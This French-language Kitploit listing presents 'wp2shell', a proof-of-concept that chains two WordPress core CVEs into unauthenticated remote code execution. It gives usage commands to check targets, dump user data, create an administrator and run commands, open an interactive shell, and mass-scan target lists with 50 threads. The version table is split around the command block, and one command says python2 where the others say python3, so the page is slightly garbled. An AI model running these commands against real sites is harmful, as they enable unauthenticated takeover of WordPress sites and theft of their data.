Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/johenlastgen-jlg/wp2shell
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)

Voir le dépôt
21il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
wp2shell — wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Partager

wp2shell - PoC RCE WordPress (CVE-2026-63030 + CVE-2026-60137)

Exécution de code à distance non authentifiée dans le noyau WordPress

par : JohenLastGen


📌 Aperçu

Cet outil enchaîne deux vulnérabilités critiques de WordPress pour réaliser une RCE non authentifiée :

VulnérabilitéCVEDescription
Confusion de route batch RESTCVE-2026-63030Contourne la validation, fait passer en contrebande une charge utile d'injection SQL
WP_Query author__not_in SQLiCVE-2026-60137Injection brute de chaîne → exécution SQL

Impact : Attaquant non authentifié → créer un administrateur → exécuter des commandes


🎯 Versions affectées

Plage de versionsStatut
WordPress 6.9.0 - 6.9.4✅ VULNÉRABLE (Chaîne RCE complète)

🚀 Démarrage rapide

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
Télécharger l’outil
WordPress 7.0.0 - 7.0.1✅ VULNÉRABLE (Chaîne RCE complète)
WordPress 6.8.0 - 6.8.5⚠️ SQLi uniquement (nécessite un plugin facilitateur)
WordPress 6.9.5, 7.0.2+❌ Corrigé